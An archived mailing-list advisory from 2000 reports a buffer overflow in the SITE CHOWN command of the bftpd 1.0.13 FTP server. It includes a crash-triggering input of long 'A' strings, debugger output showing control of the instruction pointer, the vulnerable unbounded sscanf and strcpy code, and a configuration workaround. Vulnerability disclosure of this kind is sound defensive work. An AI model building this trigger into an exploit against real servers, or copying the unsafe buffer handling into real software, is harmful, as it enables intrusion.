OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: Potential Buffer Overflow vulnerability in bftpd-1.0.13
From: BAILLEUX Christophe (cbGROLIER.FR)
Date: Wed Dec 13 2000 - 13:13:25 CST


There is a potential buffer overflow vulnerability in the command "SITE
CHOWN"

230 User logged in.
site chown AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.AAAAAAAAAA A
550 User 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' not found.
Connection closed by foreign host.

gdb /usr/sbin/bftpd 18214
.............
Loaded symbols for /lib/libnss_compat.so.2
Reading symbols from /lib/libnsl.so.1...done.
Loaded symbols for /lib/libnsl.so.1
0x400e7514 in read () from /lib/libc.so.6
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) x $esp
0xbffffc68: 0x41414141
(gdb)

The problem is in the command_chown function in commands.c :

465 void command_chown(char *params) {
466 char foo[USERLEN + 1], owner[USERLEN + 1], group[USERLEN + 1], filename[256];
467 int uid, gid;
468 if(!strstr(params, " ")) {
469 fprintf(stderr, "550 Usage: SITE CHOWN <owner>[.<group>] <filename>\r\n");
470 return;
471 }
472 sscanf(params, "%[^ ] %s", foo, filename);
473 if(strstr(foo, "."))
474 sscanf(foo, "%[^.].%s", owner, group);
475 else {
476 strcpy(owner, foo);
477 group[0] = '\0';
478 }
479 if(!sscanf(owner, "%i", &uid)) /* Is it a number? */
480 if(((uid = mygetpwnam(owner, passwdfile))) < 0) {
481 fprintf(stderr, "550 User '%s' not found.\r\n", owner);
482 return;
483 }

Workaround :

Replace in /etc/bftpd.conf

  ENABLE_SITE=yes

by

  ENABLE_SITE=no

Best regards,

--
BAILLEUX Christophe - Network & System Security Engineer
Grolier Interactive Europe-OG/CS
Voice:+33-(0)1-5545-4789 - mailto:cbgrolier.fr